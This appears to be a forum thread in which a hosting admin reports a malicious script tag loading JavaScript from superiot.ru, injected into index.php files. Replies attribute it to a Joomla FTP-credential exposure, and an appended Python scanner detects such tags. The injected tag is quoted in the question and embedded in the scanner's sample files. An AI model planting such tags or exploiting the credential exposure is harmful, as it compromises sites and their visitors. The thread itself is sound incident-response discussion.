Hello,
I manage the hosting for a few dozen websites. For about a week now I've been finding this code in 12 different websites in the index.php files:
<script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of the actual javascript file differs
<!-- some hash here-->
Some of the websites are on different servers, some aren't. I'm just wondering if anyone else has been seeing this too.
Edit with some more information:
- All servers are CentOS 5.3
- PHP versions are either 5.2.9 or 5.2.4
- Apache versions are either 2.2.3 or 1.3.39
-
Are you using the same software on each of the websites in question?
Looks like either a tainted CMS plugin or your sites have attracted some undesirable attention.
klennepette : 2 of the websites use the Joomla CMS, the others are custom built. They don't seem to share a third party tool besides google analytics.
danlefree : While there is still a strong likelihood that the attack was automated, you should probably respond to this incident as though a malicious user has access to your systems (because he probably does, if he bothers using it).
From danlefree
-
That javascript is added through an FTP exploit. If I recall, it finds the FTP account data through a hole in Joomla that exposes the FTP Layer user/password which Joomla so elegantly stores in the clear.
You'll find any index.*, default.*, home.* may be affected. Also, pay particular attention to jquery.js that is locally maintained, it can modify that to add code to the bottom.
From karmawhore
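A defensive sweep for the pattern described in the question and in the answer above, added here as an example (not code from any of the posters): it walks a web root, checks the file names the answer lists plus local .js files, and reports script tags that load from hosts outside an allowlist, flagging the ones that sit at the very end of the file. The allowlisted host, `placeholder.js` and the sample files are constructed, and the scan assumes the injection keeps the `<script src=...>` form quoted in the question.

```python
import fnmatch
import re
import tempfile
from pathlib import Path

# File names the answer singles out, plus locally hosted JavaScript such as jquery.js.
TARGET_GLOBS = ("index.*", "default.*", "home.*", "*.js")
# A script tag that loads from an absolute URL; group 1 captures the host name.
SCRIPT_SRC = re.compile(rb'<script\b[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>:]+)[^>]*>', re.I)
# Only a closing tag, one HTML comment and whitespace: the tag sits at the end of the file.
TAIL = re.compile(rb'\s*(?:</script>)?\s*(?:<!--.*?-->)?\s*', re.S)

def scan_file(path, allowed_hosts=()):
    """Return [(line, host, at_end_of_file)] for script tags whose host is not allowed."""
    data = Path(path).read_bytes()
    hits = []
    for m in SCRIPT_SRC.finditer(data):
        host = m.group(1).decode("ascii", "replace").lower()
        if host not in allowed_hosts:
            line = data.count(b"\n", 0, m.start()) + 1
            hits.append((line, host, TAIL.fullmatch(data, m.end()) is not None))
    return hits

def scan_tree(root, allowed_hosts=()):
    """Walk a web root and return {relative_path: hits} for the targeted file names."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and any(fnmatch.fnmatch(path.name.lower(), g) for g in TARGET_GLOBS):
            hits = scan_file(path, allowed_hosts)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample files, written to a temporary directory by demo().
INJECTED = b'<script type="text/javascript" src="http://superiot.ru/placeholder.js"></script>\n<!-- placeholder -->\n'
SAMPLES = {
    "index.php": b"<?php echo 'hi'; ?>\n</html>\n" + INJECTED,
    "js/jquery.js": b"/* local copy */\nfunction f() {}\n" + INJECTED,
    "home.html": b'<script src="http://cdn.example.com/lib.js"></script>\n<p>ok</p>\n',
    "about.php": INJECTED,  # name is outside TARGET_GLOBS, so it is not scanned
}

def demo():
    """Write SAMPLES to a temporary directory and scan it, allowing one known CDN host."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = Path(root, rel)
            full.parent.mkdir(parents=True, exist_ok=True)
            full.write_bytes(body)
        return scan_tree(root, allowed_hosts={"cdn.example.com"})
```

Point `scan_tree` at each site's document root with the hosts that site legitimately loads scripts from; widen `TARGET_GLOBS` if other file names need checking.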